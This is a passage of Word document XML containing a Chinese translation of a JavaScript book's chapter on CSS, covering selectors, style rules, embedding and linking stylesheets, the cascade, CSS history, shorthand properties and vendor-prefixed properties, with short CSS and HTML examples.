        <w:t>selector</w:t>
      </w:r>
      <w:r>
        <w:t>）描述的一组</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素关联在一起。一个选择器基于元素</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>、类名或标签名或更多条件指定（或称</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>选择</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）一个或多个文档中的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍了选择器，并描述了如何用</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>来获得匹配选择器的一组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表的基本元素是样式规则，它们由选择器和包裹在一对</w:t>
      </w:r>
      <w:r>
        <w:t>“{}”</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性和值所组成。每个样式表可以包含任意数量的样式规则：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p{/*</w:t>
      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
      <w:r>
        <w:t>"p"</w:t>
      </w:r>
      <w:r>
        <w:t>匹配所有的＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text-in</w:t>
      </w:r>
      <w:r>
        <w:t>dent:.5in;/*</w:t>
      </w:r>
      <w:r>
        <w:t>首行缩进</w:t>
      </w:r>
      <w:r>
        <w:t>0.5</w:t>
      </w:r>
      <w:r>
        <w:t>英寸</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.warning{/*</w:t>
      </w:r>
      <w:r>
        <w:t>任何以</w:t>
      </w:r>
      <w:r>
        <w:t>"warning"</w:t>
      </w:r>
      <w:r>
        <w:t>类命名的元素</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background-color:yellow;/*</w:t>
      </w:r>
      <w:r>
        <w:t>设置为黄色背景</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:solid black 5px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>和黑色大边框</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用＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/style</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签把一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表包起来放在＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签里，它就和</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档关联在一起了。类似＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素内容也不会被当成</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>来解析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Test D</w:t>
      </w:r>
      <w:r>
        <w:t>ocument</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>body{margin-left:30px;margin-right:15px;background-color:#ffffff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p{font-size:24px;}</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r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Testing,testing</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</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当一个样式表需要在网站的多个页面中使用时，通常将其保存在自己的文件中较好，这个文件不含任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签。它可以被引入到</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面中。但是，不像＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，＜</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素并没有</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性。为了在页面中引入样式表，在文档的＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞中使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Test Document</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>link rel="stylesheet"href="mystyles.css"type="text/css"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>简言之，这就是</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的工作方式。</w:t>
      </w:r>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>还有几个值得理解的知识点将在以下几节中逐一解释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="16_1_1_Ceng_Die_"/>
      <w:r>
        <w:t>16.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　层叠</w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回想一下，在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>里</w:t>
      </w:r>
      <w:r>
        <w:t>"C"</w:t>
      </w:r>
      <w:r>
        <w:t>代表了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>层叠</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。该术语指示了应用于文档中任何给定元素的样式规则是各个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>来源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>层叠</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>效果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的默认样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>文档的样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>每个独立的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当然，</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性中的样式覆盖了样式表中的样式，并且文档的样式表中的样式覆盖了浏览器的默认样式。任意给定元素的视觉表现可能是来自</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个来源的一个样式组合。一个元素甚至可能匹配样式表中的多个选择器，在此情况下，所有这些选择器的关</w:t>
      </w:r>
      <w:r>
        <w:t>联样式属性都将应用到该元素上。（如果不同的选择器为同一个样式属性</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定义了不同的值，那么与最具体的选择器相关联的值将覆盖与不那么具体的选择器相关联的值。不过，详细的解释超出了本书的范围。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为显示文档元素，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>必须</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>组合元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性，包括来自文档样式表中所有匹配的选择器的样式值。计算的结果是一组实际用于显示元素的样式属性和值。这组值就是元素的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算样式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>computed style</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="16_1_2_CSSLi_Shi_"/>
      <w:r>
        <w:t>16.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>历史</w:t>
      </w:r>
      <w:bookmarkEnd w:id="402"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>是一个相对较老的标准。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS1</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>1996</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月被采纳，它定义了具体的颜色、字体、外边距、边框和其他的基本样式。类似</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape 4</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Internet Explorer 4</w:t>
      </w:r>
      <w:r>
        <w:t>这样的老式浏览器极力支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS1</w:t>
      </w:r>
      <w:r>
        <w:t>。该标准的第二版（</w:t>
      </w:r>
      <w:r>
        <w:t>CSS2</w:t>
      </w:r>
      <w:r>
        <w:t>）在</w:t>
      </w:r>
      <w:r>
        <w:t>1998</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>月被采纳，它定义了许多高级特性，最著名的就是支持元素的绝对定位。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS 2.1</w:t>
      </w:r>
      <w:r>
        <w:t>澄清和更正了</w:t>
      </w:r>
      <w:r>
        <w:t>CSS 2</w:t>
      </w:r>
      <w:r>
        <w:t>，并且它删除了浏览器供应商从未实现的功能。现代浏览器基本上都完全支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS2.1</w:t>
      </w:r>
      <w:r>
        <w:t>，但是低于</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>还有一些遗漏问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的后继工作中，针对版本</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>规范已经分拆成各种各样的专门化模块，分别来通过标准化进程。可以在</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.w3.org/Style/CSS/current-work</w:t>
      </w:r>
      <w:r>
        <w:t>中找到</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>规范和工作草案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="16_1_3_Fu_He_Shu_Xing_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>16.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　复合属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某些经常在一起使用的样式属性可以组合起来使用一个特殊的复合属性。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>f ont-family</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>font-size</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>font-weight</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以用</w:t>
      </w:r>
      <w:r>
        <w:t>font</w:t>
      </w:r>
      <w:r>
        <w:t>的复合属性值一次性设置：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font:bold italic 24pt helvetica;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样，</w:t>
      </w:r>
      <w:r>
        <w:t>border</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:t>属性就</w:t>
      </w:r>
      <w:r>
        <w:t>是为元素的每条边都设置边框、外边距和内边距（元素和边框之间的空间）的复合属性。例如，代替使用</w:t>
      </w:r>
      <w:r>
        <w:t>border</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>border-left</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>border-right</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>border-top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>border-bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性来独立设置边框的每条边。事实上，这些属性本身也是复合属性，例如，代替指定</w:t>
      </w:r>
      <w:r>
        <w:t>border-top</w:t>
      </w:r>
      <w:r>
        <w:t>，可以分别指定</w:t>
      </w:r>
      <w:r>
        <w:t>border-top-color</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>border-top-style</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>border-top-width</w:t>
      </w:r>
      <w:r>
        <w:t>等属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="404" w:name="16_1_4_Fei_Biao_Zhun_Shu_Xing_"/>
      <w:r>
        <w:t>16.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　非标准属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="404"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当浏览器厂商实现非标准</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，它们用将属性名</w:t>
      </w:r>
      <w:r>
        <w:t>前加了一个厂商前缀。</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>-moz-</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>-webkit-</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>-ms-</w:t>
      </w:r>
      <w:r>
        <w:t>，它们甚至用这种方式来实现将来会标准化的属性。有个例</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>子是</w:t>
      </w:r>
      <w:r>
        <w:t>border-radius</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它用来指定元素的圆角，在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 4</w:t>
      </w:r>
      <w:r>
        <w:t>实验性的实现中使用了前缀。一旦标准已经充分成熟，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 5</w:t>
      </w:r>
      <w:r>
        <w:t>就移除了前缀，直接支持</w:t>
      </w:r>
      <w:r>
        <w:t>border-radius</w:t>
      </w:r>
      <w:r>
        <w:t>。（</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>已经支持没有前缀的</w:t>
      </w:r>
      <w:r>
        <w:t>border-radius</w:t>
      </w:r>
      <w:r>
        <w:t>很长一段时间了。</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>也支持了没有前缀的</w:t>
      </w:r>
      <w:r>
        <w:t>border-ra</w:t>
      </w:r>
      <w:r>
        <w:t>dius</w:t>
      </w:r>
      <w:r>
        <w:t>，但是在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>中即使有前缀也没有支持。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在不同浏览器中有不同名字的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性一起工作，你可能发现为一个属性定义一个类方式比较好：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.radius10{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border-radius:10px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>针对现代浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-moz-border-radius:10px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.x*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-webkit-border-radius:10px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:t>Safari 3.2</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>4*/</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像这样定义一个类叫</w:t>
      </w:r>
      <w:r>
        <w:t>"radius10"</w:t>
      </w:r>
      <w:r>
        <w:t>，可以将它添加到任意需要</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>像素圆角的元素的类上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="405" w:name="16_1_5_CSSJu_Li_"/>
      <w:r>
        <w:t>16.1.5</w:t>
      </w:r>
